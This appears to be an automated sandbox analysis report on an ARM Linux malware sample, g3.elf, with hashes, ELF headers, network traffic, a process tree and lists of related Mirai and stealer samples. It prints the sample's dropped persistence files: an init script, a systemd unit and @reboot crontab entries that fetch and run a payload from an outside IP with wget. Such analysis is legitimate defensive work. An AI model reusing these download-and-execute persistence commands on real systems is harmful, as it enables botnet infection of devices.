                          m5.elfGet hashmaliciousUnknownBrowse
                            m2.elfGet hashmaliciousUnknownBrowse
                              1.1.1.1watchdog.elfGet hashmaliciousXmrigBrowse
                              • 1.1.1.1:8080/
                              6fW0GedR6j.xlsGet hashmaliciousUnknownBrowse
                              • 1.1.1.1/ctrl/playback.php
                              PO-230821_pdf.exeGet hashmaliciousFormBook, NSISDropperBrowse
                              • www.974dp.com/sn26/?kJBLpb8=qaEGeuQorcUQurUZCuE8d9pas+Z0M0brqtX248JBolEfq8j8F1R9i1jKZexhxY54UlRG&ML0tl=NZlpi
                              AFfv8HpACF.exeGet hashmaliciousUnknownBrowse
                              • 1.1.1.1/
                              INVOICE_90990_PDF.exeGet hashmaliciousFormBookBrowse
                              • www.quranvisor.com/usvr/?mN9d3vF=HHrW7cA9N4YJlebHFvlsdlDciSnnaQItEG8Ccfxp291VjnjcuwoPACt7EOqEq4SWjIf8&Pjf81=-Zdd-V5hqhM4p2S
                              Go.exeGet hashmaliciousUnknownBrowse
                              • 1.1.1.1/
                              No context
                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              CLOUDFLARENETUS1001-13.exeGet hashmaliciousFormBookBrowse
                              • 188.114.96.3
                              24010-KAPSON.exeGet hashmaliciousAzorult, GuLoaderBrowse
                              • 104.21.32.1
                              https://file2-cdn.creality.com/file/2e068bd90e233501c8036fb25c76e092/CrealityScan_win_3.3.4-20241030.exeGet hashmaliciousUnknownBrowse
                              • 162.159.61.3
                              g4.elfGet hashmaliciousUnknownBrowse
                              • 1.1.1.1
                              msit.exeGet hashmaliciousLummaC StealerBrowse
                              • 104.21.6.116
                              tesr.exeGet hashmaliciousLummaC StealerBrowse
                              • 104.21.90.18
                              WSLRT.exeGet hashmaliciousLummaC StealerBrowse
                              • 172.67.134.197
                              msit.msiGet hashmaliciousLummaC StealerBrowse
                              • 172.67.134.197
                              Shipping Docs Waybill No 2009 xxxx 351.exeGet hashmaliciousAgentTeslaBrowse
                              • 104.26.13.205
                              trow.exeGet hashmaliciousUnknownBrowse
                              • 188.114.96.3
                              INIT7CHlibsocks5.soGet hashmaliciousUnknownBrowse
                              • 109.202.202.202
                              g1.elfGet hashmaliciousUnknownBrowse
                              • 109.202.202.202
                              na.elfGet hashmaliciousPrometeiBrowse
                              • 109.202.202.202
                              g2.elfGet hashmaliciousUnknownBrowse
                              • 109.202.202.202
                              arm5.elfGet hashmaliciousMiraiBrowse
                              • 109.202.202.202
                              boatnet.spc.elfGet hashmaliciousMiraiBrowse
                              • 109.202.202.202
                              boatnet.arm7.elfGet hashmaliciousMiraiBrowse
                              • 109.202.202.202
                              boatnet.x86.elfGet hashmaliciousMiraiBrowse
                              • 109.202.202.202
                              t1.elfGet hashmaliciousUnknownBrowse
                              • 109.202.202.202
                              t3.elfGet hashmaliciousUnknownBrowse
                              • 109.202.202.202
                              ASGHOSTNETDEg4.elfGet hashmaliciousUnknownBrowse
                              • 77.90.22.16
                              g3.elfGet hashmaliciousUnknownBrowse
                              • 77.90.22.16
                              g5.elfGet hashmaliciousUnknownBrowse
                              • 77.90.22.16
                              g4.elfGet hashmaliciousUnknownBrowse
                              • 77.90.22.16
                              g6.elfGet hashmaliciousUnknownBrowse
                              • 77.90.22.16
                              g3.elfGet hashmaliciousUnknownBrowse
                              • 77.90.22.16
                              ppc.elfGet hashmaliciousMiraiBrowse
                              • 5.175.194.122
                              x86.elfGet hashmaliciousMiraiBrowse
                              • 5.175.146.210
                              m1.elfGet hashmaliciousUnknownBrowse
                              • 77.90.22.16
                              m5.elfGet hashmaliciousUnknownBrowse
                              • 77.90.22.16
                              No context
                              No context
                              Process:/tmp/g3.elf
                              File Type:Bourne-Again shell script, ASCII text executable
                              Category:dropped
                              Size (bytes):623
                              Entropy (8bit):4.741518354128752
                              Encrypted:false
                              SSDEEP:12:i5BpMp5kTMp5Gu+a6pjqQ3y259srxylKNVUdURucTyl:ifpMr8MrPd6Nq+yAsrxy8bp4
                              MD5:3186272F62CFD439812081788331D643
                              SHA1:7E5F92108A72671625CBD3FBEFA70E48B6FD3DA2
                              SHA-256:FB0C2CAAACE3B6E9D320972D70A4365743F3FA395948AA5BE3421FA1093E4A1E
                              SHA-512:53A426FDABDC857B98B69EEFD1BCAF37F05070C914F63CD581D1E3D73AEB823F4FAAD3E74F2E7AED8919020490962C28D9E58502B22FA2AC0E88BBD5E621026C
                              Malicious:true
                              Reputation:low
                              Preview:#!/bin/bash.### BEGIN INIT INFO.# Provides: hello.# Required-Start: $network $local_fs.# Required-Stop: $network $local_fs.# Default-Start: 2 3 4 5.# Default-Stop: 0 1 6.# Short-Description: hi :).# Description: hello :).### END INIT INFO..case "$1" in. start).rm -rf /tmp/g3; wget http://103.136.41.100/g3 -O /tmp/g3; chmod 777 /tmp/g3; /tmp/g3 >C 2 R -1157128192 A arm..p4 > /dev/null 2>&1;" ;;. stop). exit 0. ;;. restart). $0 stop. $0 start. ;;. *). echo "Usage: $0 {start|stop|restart}". exit 1. ;;.esac..exit 0.
                              Process:/tmp/g3.elf
                              File Type:troff or preprocessor input, ASCII text
                              Category:dropped
                              Size (bytes):319
                              Entropy (8bit):5.256130163145095
                              Encrypted:false
                              SSDEEP:6:z8KbX9RZAMGCk4vEuIACLm+fOADDjF5CY1E0aKDmtXIEkqTsCBLQmWA4Rv:zb9RZADJiIE+m6jqQ32FLHWrv
                              MD5:2E3FC7A0688440994C5EDCC058DD82AA
                              SHA1:22711412C7E08DCF7D09E1E5D7D3B932D4964D09
                              SHA-256:2A53EE6E5BEE6C8C8EB12DF0123D471D1F0D0B1CFB8AE833944DE0A962251E89
                              SHA-512:382B6FB11C0D27A245EF34E7D9DC8835E85288ED73747DADDB57937808C1182EC3BCD43D88913FFF288646C3EC8CB7C0461C23116E30DAA2E81D5DA6B904CCA5
                              Malicious:false
                              Reputation:low
                              Preview:[Unit].Description=hi.After=network.target..[Service].RemainAfterExit=true.TimeoutSec=30s.Restart=no.ExecStart=/bin/bash -c "sleep 10; rm -rf /tmp/g3; wget http://103.136.41.100/g3 -O /tmp/g3; chmod 777 /tmp/g3; /tmp/g3 >C 2 R -1157128192 A arm..p1 > /dev/null 2>&1;".Type=forking..[Install].WantedBy=multi-user.target.
                              Process:/usr/lib/systemd/system-environment-generators/snapd-env-generator
                              File Type:ASCII text
                              Category:dropped
                              Size (bytes):76
                              Entropy (8bit):3.7627880354948586
                              Encrypted:false
                              SSDEEP:3:+M4VMPQnMLmPQ9JEcwwbn:+M4m4MixcZb
                              MD5:D86A1F5765F37989EB0EC3837AD13ECC
                              SHA1:D749672A734D9DEAFD61DCA501C6929EC431B83E
                              SHA-256:85889AB8222C947C58BE565723AE603CC1A0BD2153B6B11E156826A21E6CCD45
                              SHA-512:338C4B776FDCC2D05E869AE1F9DB64E6E7ECC4C621AB45E51DD07C73306BACBAD7882BE8D3ACF472CAEB30D4E5367F8793D3E006694184A68F74AC943A4B7C07
                              Malicious:false
                              Reputation:moderate, very likely benign file
                              Preview:PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin.
                              Process:/tmp/g3.elf
                              File Type:troff or preprocessor input, ASCII text
                              Category:dropped
                              Size (bytes):140
                              Entropy (8bit):4.793195438323841
                              Encrypted:false
                              SSDEEP:3:SH3YFKKDDjeMPHRCQqwui1SGuV0uVKDmFXXIUU0XzeVpFw2sePn:SH3oDDjF5CY1E0aKDmtXIEkrw5Cn
                              MD5:1C9C1FE3B9BA174C1C9ED34BF02BDC9E
                              SHA1:350633A79379094B2D98A6E6F058011263EE5C3E
                              SHA-256:F5A064A03BA9D038304D3D57A673196F0E4E19BAA4699C0239062C6638A52F46
                              SHA-512:1F1F95C993958919BFEB2411DD3019C0741C30E175CDCC30301485E965E921BC8C4A8EFE1A149F540B5C9BE3C31D71EEDFE2AA9CFF1E486B863061B9F7C6201C
                              Malicious:true
                              Reputation:low
                              Preview:@rebootrm -rf /tmp/g3; wget http://103.136.41.100/g3 -O /tmp/g3; chmod 777 /tmp/g3; /tmp/g3 >C 2 R -1157128192 A arm..p2 > /dev/null 2>&1;".
                              Process:/tmp/g3.elf
                              File Type:zlib compressed data
                              Category:dropped
                              Size (bytes):259
                              Entropy (8bit):3.4305646336293654
                              Encrypted:false
                              SSDEEP:6:QVDFHa7Y/VUS/FYDFH//VjmsVot/VOArB/VF:QVmS/FQI/
                              MD5:BA9320AA41B50FAEFB745084E08E2215
                              SHA1:002B81A5AF435BE4CA438CDE1C6446D619B25E2E
                              SHA-256:62C940BA1824CC359C9A52BBF37D98F494A04BEEF9D5EC8831A5BC63B3F353E5
                              SHA-512:F4444DCCF85BC3EA58A2BED5BA9AA37ED13630CF22A2A477F557106621BAF44C3546431DE4E38A4324168309F72DE266EE2ED54C7938578B6472053FED24A6B7
                              Malicious:false
                              Reputation:low
                              Preview:8000-1c000 r-xp 00000000 fd:00 531606 /tmp/g3.elf.23000-24000 rw-p 00013000 fd:00 531606 /tmp/g3.elf.24000-2a000 rw-p 00000000 00:00 0 .ff7ef000-ff7f0000 ---p 00000000 00:00 0 .ff7f0000-ffff0000 rw-p 00000000 00:00 0 [stack]..
                              Process:/usr/bin/crontab
                              File Type:troff or preprocessor input, ASCII text
                              Category:dropped
                              Size (bytes):330
                              Entropy (8bit):5.224678564544612
                              Encrypted:false
                              SSDEEP:6:SUrpqoqQjEOP1K8XAEuLuwJOBFQ3sfwveiGMQ5UYLtCFt3HYoDDjF5CY1E0aKDmE:8Qj7QEuLut8OwveUeHLUHYCjqQ3P9
                              MD5:913B6EF00D43BE3A7114C49DFEC3DDA5
                              SHA1:7259AD1C7524B1E292F5A1CA2CE5F258D87DA89B
                              SHA-256:A1D8B23DC82DD788BBBEA697415E66B2B4E02396B2F092F9F86E80ABF120AE3F
                              SHA-512:0483BE4B24E5DBE4139E7D220541B2C95E900F481D1DA8D02CB2D641D0FBBA49C1998C2156B4A4420C1B9F8A8AC2FE231262F4E80151EF40F56A1A06310A8226
                              Malicious:true
                              Reputation:low
                              Preview:# DO NOT EDIT THIS FILE - edit the master and reinstall..# (/tmp/crontab.tmp installed on Mon Jan 13 02:43:02 2025).# (Cron version -- $Id: crontab.c,v 2.13 1994/01/17 03:20:37 vixie Exp $).@rebootrm -rf /tmp/g3; wget http://103.136.41.100/g3 -O /tmp/g3; chmod 777 /tmp/g3; /tmp/g3 >C 2 R -1157128192 A arm..p2 > /dev/null 2>&1;".
                              File type:ELF 32-bit LSB executable, ARM, version 1 (ARM), statically linked, stripped
                              Entropy (8bit):6.1233461028429375
                              TrID:
                              • ELF Executable and Linkable format (generic) (4004/1) 100.00%
                              File name:g3.elf
                              File size:79'732 bytes
                              MD5:54a27644f1f545399646d19da0345e1d
                              SHA1:d34d24dd85384e5058ed162ea9af2e1f497f1049
                              SHA256:773f77b3dec9437e08cf0aff0871b179bef8d08506504a2a282a8353d1581973
                              SHA512:38774e4f78022f451a404134024c8c9f42271b12b648c603e67fe32cd538885571af24ff037cdad693f94e17a121e761a55f83df699af775782102a941f9beea
                              SSDEEP:1536:Z5LO8kRBjA+reCymux+Hx0Mh+6DZGy/i7Frvy7yQnRgIZgTeg:68kBjAqe8uik6lHwFrvy7L2JT
                              TLSH:4A73085AFC869742C5C145FB771E029C37266BA8E2EB3303AD241F21779AA1F0F27546
                              File Content Preview:.ELF...a..........(.........4....5......4. ...(......................0...0...............0...0...0......L...........Q.td..................................-...L."....E..........0@-.\P...0....S.0...P@...0... ....R......0...0...........0... ....R..... 0....S

                              ELF header

                              Class:ELF32
                              Data:2's complement, little endian
                              Version:1 (current)
                              Machine:ARM
                              Version Number:0x1
                              Type:EXEC (Executable file)
                              OS/ABI:ARM - ABI
                              ABI Version:0
                              Entry Point Address:0x8190
                              Flags:0x202
                              ELF Header Size:52
                              Program Header Offset:52
                              Program Header Size:32
                              Number of Program Headers:3
                              Section Header Offset:79292
                              Section Header Size:40
                              Number of Section Headers:11
                              Header String Table Index:10
                              NameTypeAddressOffsetSizeEntSizeFlagsFlags DescriptionLinkInfoAlign
                              NULL0x00x00x00x00x0000
                              .initPROGBITS0x80940x940x180x00x6AX004
                              .textPROGBITS0x80b00xb00x116b80x00x6AX0016
                              .finiPROGBITS0x197680x117680x140x00x6AX004
                              .rodataPROGBITS0x1977c0x1177c0x19440x00x2A004
                              .eh_framePROGBITS0x230c00x130c00x40x00x3WA004
                              .ctorsPROGBITS0x230c40x130c40x80x00x3WA004
                              .dtorsPROGBITS0x230cc0x130cc0x80x00x3WA004
                              .dataPROGBITS0x230d80x130d80x49c0x00x3WA004
                              .bssNOBITS0x235740x135740x29980x00x3WA004
                              .shstrtabSTRTAB0x00x135740x480x00x0001
                              TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeEntropyFlagsFlags DescriptionAlignProg InterpreterSection Mappings
                              LOAD0x00x80000x80000x130c00x130c06.11590x5R E0x8000.init .text .fini .rodata
                              LOAD0x130c00x230c00x230c00x4b40x2e4c6.06330x6RW 0x8000.eh_frame .ctors .dtors .data .bss
                              GNU_STACK0x00x00x00x00x00.00000x7RWE0x4
                              TimestampSource PortDest PortSource IPDest IP
                              Jan 13, 2025 09:42:56.237217903 CET43928443192.168.2.2391.189.91.42
                              Jan 13, 2025 09:43:01.771914005 CET5350153192.168.2.231.1.1.1
                              Jan 13, 2025 09:43:01.777080059 CET53535011.1.1.1192.168.2.23
                              Jan 13, 2025 09:43:01.777208090 CET5350153192.168.2.231.1.1.1
                              Jan 13, 2025 09:43:01.777323961 CET5350153192.168.2.231.1.1.1
                              Jan 13, 2025 09:43:01.782315969 CET53535011.1.1.1192.168.2.23
                              Jan 13, 2025 09:43:01.782382965 CET5350153192.168.2.231.1.1.1
                              Jan 13, 2025 09:43:01.868325949 CET42836443192.168.2.2391.189.91.43
                              Jan 13, 2025 09:43:02.892204046 CET4251680192.168.2.23109.202.202.202
                              Jan 13, 2025 09:43:04.240237951 CET488345625192.168.2.2377.90.22.16
                              Jan 13, 2025 09:43:04.245199919 CET56254883477.90.22.16192.168.2.23
                              Jan 13, 2025 09:43:04.245282888 CET488345625192.168.2.2377.90.22.16
                              Jan 13, 2025 09:43:04.266889095 CET488345625192.168.2.2377.90.22.16
                              Jan 13, 2025 09:43:04.271711111 CET56254883477.90.22.16192.168.2.23
                              Jan 13, 2025 09:43:16.970235109 CET43928443192.168.2.2391.189.91.42
                              Jan 13, 2025 09:43:29.256525993 CET42836443192.168.2.2391.189.91.43
                              Jan 13, 2025 09:43:33.352103949 CET4251680192.168.2.23109.202.202.202
                              Jan 13, 2025 09:43:35.399584055 CET488345625192.168.2.2377.90.22.16
                              Jan 13, 2025 09:43:35.404573917 CET56254883477.90.22.16192.168.2.23
                              Jan 13, 2025 09:43:57.924532890 CET43928443192.168.2.2391.189.91.42
                              Jan 13, 2025 09:44:06.115329981 CET488345625192.168.2.2377.90.22.16
                              Jan 13, 2025 09:44:06.120251894 CET56254883477.90.22.16192.168.2.23
                              Jan 13, 2025 09:44:15.350225925 CET488345625192.168.2.2377.90.22.16
                              Jan 13, 2025 09:44:15.354985952 CET56254883477.90.22.16192.168.2.23
                              Jan 13, 2025 09:44:15.527966022 CET56254883477.90.22.16192.168.2.23
                              Jan 13, 2025 09:44:15.528181076 CET488345625192.168.2.2377.90.22.16
                              Jan 13, 2025 09:44:47.069550037 CET488345625192.168.2.2377.90.22.16
                              Jan 13, 2025 09:44:47.074357986 CET56254883477.90.22.16192.168.2.23

                              System Behavior

                              Start time (UTC):08:42:52
                              Start date (UTC):13/01/2025
                              Path:/usr/bin/dash
                              Arguments:-
                              File size:129816 bytes
                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                              Start time (UTC):08:42:52
                              Start date (UTC):13/01/2025
                              Path:/usr/bin/rm
                              Arguments:rm -f /tmp/tmp.h3frGKTOun /tmp/tmp.jefTPyTfQB /tmp/tmp.tupEN03WGQ
                              File size:72056 bytes
                              MD5 hash:aa2b5496fdbfd88e38791ab81f90b95b

                              Start time (UTC):08:42:52
                              Start date (UTC):13/01/2025
                              Path:/usr/bin/dash
                              Arguments:-
                              File size:129816 bytes
                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                              Start time (UTC):08:42:52
                              Start date (UTC):13/01/2025
                              Path:/usr/bin/rm
                              Arguments:rm -f /tmp/tmp.h3frGKTOun /tmp/tmp.jefTPyTfQB /tmp/tmp.tupEN03WGQ
                              File size:72056 bytes
                              MD5 hash:aa2b5496fdbfd88e38791ab81f90b95b

                              Start time (UTC):08:42:56
                              Start date (UTC):13/01/2025
                              Path:/tmp/g3.elf
                              Arguments:/tmp/g3.elf
                              File size:4956856 bytes
                              MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                              Start time (UTC):08:43:01
                              Start date (UTC):13/01/2025
                              Path:/tmp/g3.elf
                              Arguments:-
                              File size:4956856 bytes
                              MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                              Start time (UTC):08:43:01
                              Start date (UTC):13/01/2025
                              Path:/bin/sh
                              Arguments:sh -c "systemctl daemon-reload > /dev/null 2>&1"
                              File size:129816 bytes
                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                              Start time (UTC):08:43:01
                              Start date (UTC):13/01/2025
                              Path:/bin/sh
                              Arguments:-
                              File size:129816 bytes
                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                              Start time (UTC):08:43:01
                              Start date (UTC):13/01/2025
                              Path:/usr/bin/systemctl
                              Arguments:systemctl daemon-reload
                              File size:996584 bytes
                              MD5 hash:4deddfb6741481f68aeac522cc26ff4b

                              Start time (UTC):08:43:01
                              Start date (UTC):13/01/2025
                              Path:/tmp/g3.elf
                              Arguments:-
                              File size:4956856 bytes
                              MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                              Start time (UTC):08:43:01
                              Start date (UTC):13/01/2025
                              Path:/bin/sh
                              Arguments:sh -c "systemctl start hello.service > /dev/null 2>&1"
                              File size:129816 bytes
                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                              Start time (UTC):08:43:01
                              Start date (UTC):13/01/2025
                              Path:/bin/sh
                              Arguments:-
                              File size:129816 bytes
                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                              Start time (UTC):08:43:01
                              Start date (UTC):13/01/2025
                              Path:/usr/bin/systemctl
                              Arguments:systemctl start hello.service
                              File size:996584 bytes
                              MD5 hash:4deddfb6741481f68aeac522cc26ff4b

                              Start time (UTC):08:43:01
                              Start date (UTC):13/01/2025
                              Path:/tmp/g3.elf
                              Arguments:-
                              File size:4956856 bytes
                              MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                              Start time (UTC):08:43:01
                              Start date (UTC):13/01/2025
                              Path:/bin/sh
                              Arguments:sh -c "crontab /tmp/crontab.tmp > /dev/null 2>&1"
                              File size:129816 bytes
                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                              Start time (UTC):08:43:01
                              Start date (UTC):13/01/2025
                              Path:/bin/sh
                              Arguments:-
                              File size:129816 bytes
                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                              Start time (UTC):08:43:01
                              Start date (UTC):13/01/2025
                              Path:/usr/bin/crontab
                              Arguments:crontab /tmp/crontab.tmp
                              File size:43720 bytes
                              MD5 hash:66e521d421ac9b407699061bf21806f5

                              Start time (UTC):08:43:02
                              Start date (UTC):13/01/2025
                              Path:/tmp/g3.elf
                              Arguments:-
                              File size:4956856 bytes
                              MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                              Start time (UTC):08:43:02
                              Start date (UTC):13/01/2025
                              Path:/bin/sh
                              Arguments:sh -c "/etc/init.d/hello > /dev/null 2>&1"
                              File size:129816 bytes
                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                              Start time (UTC):08:43:02
                              Start date (UTC):13/01/2025
                              Path:/bin/sh
                              Arguments:-
                              File size:129816 bytes
                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                              Start time (UTC):08:43:03
                              Start date (UTC):13/01/2025
                              Path:/tmp/g3.elf
                              Arguments:-
                              File size:4956856 bytes
                              MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                              Start time (UTC):08:43:03
                              Start date (UTC):13/01/2025
                              Path:/tmp/g3.elf
                              Arguments:-
                              File size:4956856 bytes
                              MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                              Start time (UTC):08:43:03
                              Start date (UTC):13/01/2025
                              Path:/tmp/g3.elf
                              Arguments:-
                              File size:4956856 bytes
                              MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                              Start time (UTC):08:43:03
                              Start date (UTC):13/01/2025
                              Path:/tmp/g3.elf
                              Arguments:-
                              File size:4956856 bytes
                              MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                              Start time (UTC):08:43:03
                              Start date (UTC):13/01/2025
                              Path:/tmp/g3.elf
                              Arguments:-
                              File size:4956856 bytes
                              MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                              Start time (UTC):08:42:57
                              Start date (UTC):13/01/2025
                              Path:/usr/bin/xfce4-panel
                              Arguments:-
                              File size:375768 bytes
                              MD5 hash:a15b657c7d54ac1385f1f15004ea6784

                              Start time (UTC):08:42:57
                              Start date (UTC):13/01/2025
                              Path:/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0
                              Arguments:/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libsystray.so 6 12582920 systray "Notification Area" "Area where notification icons appear"
                              File size:35136 bytes
                              MD5 hash:ac0b8a906f359a8ae102244738682e76

                              Start time (UTC):08:42:57
                              Start date (UTC):13/01/2025
                              Path:/usr/bin/xfce4-panel
                              Arguments:-
                              File size:375768 bytes
                              MD5 hash:a15b657c7d54ac1385f1f15004ea6784

                              Start time (UTC):08:42:57
                              Start date (UTC):13/01/2025
                              Path:/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0
                              Arguments:/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libstatusnotifier.so 7 12582921 statusnotifier "Status Notifier Plugin" "Provides a panel area for status notifier items (application indicators)"
                              File size:35136 bytes
                              MD5 hash:ac0b8a906f359a8ae102244738682e76

                              Start time (UTC):08:42:57
                              Start date (UTC):13/01/2025
                              Path:/usr/bin/xfce4-panel
                              Arguments:-
                              File size:375768 bytes
                              MD5 hash:a15b657c7d54ac1385f1f15004ea6784

                              Start time (UTC):08:42:57
                              Start date (UTC):13/01/2025
                              Path:/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0
                              Arguments:/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libpulseaudio-plugin.so 8 12582922 pulseaudio "PulseAudio Plugin" "Adjust the audio volume of the PulseAudio sound system"
                              File size:35136 bytes
                              MD5 hash:ac0b8a906f359a8ae102244738682e76

                              Start time (UTC):08:42:57
                              Start date (UTC):13/01/2025
                              Path:/usr/bin/xfce4-panel
                              Arguments:-
                              File size:375768 bytes
                              MD5 hash:a15b657c7d54ac1385f1f15004ea6784

                              Start time (UTC):08:42:57
                              Start date (UTC):13/01/2025
                              Path:/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0
                              Arguments:/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libxfce4powermanager.so 9 12582923 power-manager-plugin "Power Manager Plugin" "Display the battery levels of your devices and control the brightness of your display"
                              File size:35136 bytes
                              MD5 hash:ac0b8a906f359a8ae102244738682e76

                              Start time (UTC):08:42:57
                              Start date (UTC):13/01/2025
                              Path:/usr/bin/xfce4-panel
                              Arguments:-
                              File size:375768 bytes
                              MD5 hash:a15b657c7d54ac1385f1f15004ea6784

                              Start time (UTC):08:42:57
                              Start date (UTC):13/01/2025
                              Path:/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0
                              Arguments:/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libnotification-plugin.so 10 12582924 notification-plugin "Notification Plugin" "Notification plugin for the Xfce panel"
                              File size:35136 bytes
                              MD5 hash:ac0b8a906f359a8ae102244738682e76

                              Start time (UTC):08:42:57
                              Start date (UTC):13/01/2025
                              Path:/usr/bin/xfce4-panel
                              Arguments:-
                              File size:375768 bytes
                              MD5 hash:a15b657c7d54ac1385f1f15004ea6784

                              Start time (UTC):08:42:57
                              Start date (UTC):13/01/2025
                              Path:/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0
                              Arguments:/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libactions.so 14 12582925 actions "Action Buttons" "Log out, lock or other system actions"
                              File size:35136 bytes
                              MD5 hash:ac0b8a906f359a8ae102244738682e76

                              Start time (UTC):08:43:01
                              Start date (UTC):13/01/2025
                              Path:/usr/lib/systemd/systemd
                              Arguments:-
                              File size:1620224 bytes
                              MD5 hash:9b2bec7092a40488108543f9334aab75

                              Start time (UTC):08:43:01
                              Start date (UTC):13/01/2025
                              Path:/usr/lib/systemd/system-environment-generators/snapd-env-generator
                              Arguments:/usr/lib/systemd/system-environment-generators/snapd-env-generator
                              File size:22760 bytes
                              MD5 hash:3633b075f40283ec938a2a6a89671b0e